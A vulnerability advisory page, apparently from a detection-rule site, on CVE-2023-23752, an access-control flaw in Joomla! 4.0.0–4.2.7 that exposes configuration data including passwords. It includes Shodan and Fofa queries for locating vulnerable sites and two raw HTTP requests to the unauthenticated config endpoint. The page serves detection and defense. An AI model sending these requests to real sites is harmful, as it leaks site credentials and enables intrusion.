🔙 목록으로 돌아가기

CVE-2023-23752: Joomla! Webservice - Password Disclosure

TitleJoomla! Webservice - Password Disclosure
Authorbadboycxcc,Sascha Brendel
SeverityMedium
ImpactThe vulnerability can lead to unauthorized access to user passwords, compromising the confidentiality of user accounts.
RemediationUpgrade to Joomla! version 4.2.8 or later.
CVSS Score5.3
EPSS Score0.94517
CVE IDCVE-2023-23752
Shodan Queryhtml:"Joomla! - Open Source Content Management"http.html:"joomla! - open source content management"http.component:"joomla"cpe:"cpe:2.3:a:joomla:joomla\!"
Fofa Querybody="joomla! - open source content management"
Tags cve cve2023 joomla kev vkev vuln

🔍 Vulnerability Description

An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.

🌐 HTTP Request

GET /api/index.php/v1/config/application?public=true HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /api/v1/config/application?public=true HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-23752.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-23752.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A